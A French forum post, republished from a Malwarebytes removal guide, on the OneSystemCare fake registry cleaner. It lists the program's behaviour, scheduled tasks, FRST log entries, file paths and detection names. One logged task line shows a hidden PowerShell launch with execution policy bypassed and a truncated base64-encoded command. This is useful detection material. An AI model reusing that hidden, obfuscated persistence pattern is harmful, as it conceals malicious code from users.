Contenu republié avec la permission de Malwarebytes (https://forums.malwarebytes.org/index.php?showforum=39)
OneSystemCare est un faux nettoyeur/optimiseur de registre, affiche intentionnellement des faux-positifs pour convaincre l'utilisateur que son système a des problèmes et lui faire acheter le logiciel.
Plus d'infos : Registry Cleaners: Digital Snake Oil | Malwarebytes Labs (https://blog.malwarebytes.com/cybercrime/2015/06/digital-snake-oil/)
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/main.png&key=a4525aec5e34819dbd70c1616b1057247b3debb911d928f55730c62e45cf7710)
- S'installe en tant que programme, à l'insu de l'utilisateur ou parce qu'il n'a pas décoché les sponsors proposés lors de l'installation d'un logiciel gratuit légitime
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning4.png&key=79f7daf8a46166a328ed746516b7a2403979cd96167f944d4d121d6e1d59c412)
- Affiche ces alertes pendant l'installation
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning2.png&key=e99f57d516c4ffbaeac0b0767b8533f7ea28aa7eed1bb52bff83a9b1d191a897)
- Affiche ces fenêtres pendant l'opération
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning5.png&key=014478e35cd68040a3e26462f32423b6dcd5d1f1413fdd1d1072451ef113e97f)
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning6.png&key=811ff42f739c1a508f40633148315e6c3ba971af14542a497eb55bbbbfcf4398)
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning7.png&key=1f8e6bb210eccaed7d22606c6fcb3a3e92b4008b6a2f0aca34ae9bf690665a8e)
- Crée cette icône dans la Barre des tâches et sur le Bureau
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/icons.png&key=5a97ecae6bc5ea8255057fdd56dde064a1ca1a7feca19a5dfc66e45d66e77350)
- Crée ces tâches planifiées
(https://forums.malwarebytes.com/applications/core/interface/imageproxy/imageproxy.php?img=https://static-cdn.malwarebytes.org/pub_images/OneSystemCare/warning3.png&key=195886b924f3630883efccb909f3928a6f7ca164dd03aa23654dfecba0269566)
**********
Détection de OneSystemCare dans des rapports FRST :
One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ATTENTION
Task: {11FD0FCC-787D-4FF1-B466-D5659CEA6633} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {4D89F1C3-36A8-4429-8FC1-0B263DA7E332} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {668D20B7-A868-4B90-AF03-489B802C5E0A} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {6CAB0476-77E0-4D8A-9D0A-D4FC8118D982} - System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ADsAOwA7ADsAIAAgACAAIAA7ACAAIAA7ADsAIAAgACAAIAA7ACAAIAA7ACAAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (the data entry has 10184 more characters).
Task: {F04F6E92-DB17-4ED4-8BB7-2F698ABDAD9E} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
() C:\Program Files (x86)\OneSystemCare\SystemConsole.exe
() C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe
C:\Windows\System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F}
C:\Windows\System32\Tasks\One System Care Task
C:\Windows\System32\Tasks\One System Care Run Delay
C:\Windows\System32\Tasks\One System Care Monitor
C:\Windows\System32\Tasks\One System CarePeriod
C:\Windows\Tasks\One System CarePeriod.job
C:\ProgramData\2a2276f9-20a1-1
C:\ProgramData\2a2276f9-0b93-0
C:\Users\{Nom_Uilisateur}\AppData\Roaming\One System Care
C:\Program Files (x86)\OneSystemCare
C:\Users\Public\Desktop\Launch One System Care.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
**********
Détecté et traité par Malwarebytes en tant que PUP/LPI (Programme potentiellement Indésirable) et Adware
Sous la version Premium, Malwarebytes bloque le domaine vd.onesystemhost.net et l'IP 104.24.118.133
Adware.OptimizerEliteMax
PUP.Optional.OneSystemCare
PUP.Optional.DNSUnlocker.ACMB2
Tutoriel d'utilisation Malwarebytes en images (https://forum.security-x.fr/tutoriels-317/tutoriel-malwarebytes-anti-malware-22723/)
Source : Removal instructions for OneSystemCare de Metallica - Malwarebytes Forums (https://forums.malwarebytes.com/topic/196262-removal-instructions-for-onesystemcare/)
Toujours infecté ? Une question avant de faire des manipulations ?
Venez poster un nouveau sujet dans ce forum : http://forum.security-x.fr/desinfections/ en prenant soin de suivre la procédure http://forum.security-x.fr/desinfections/procedure-preliminaire/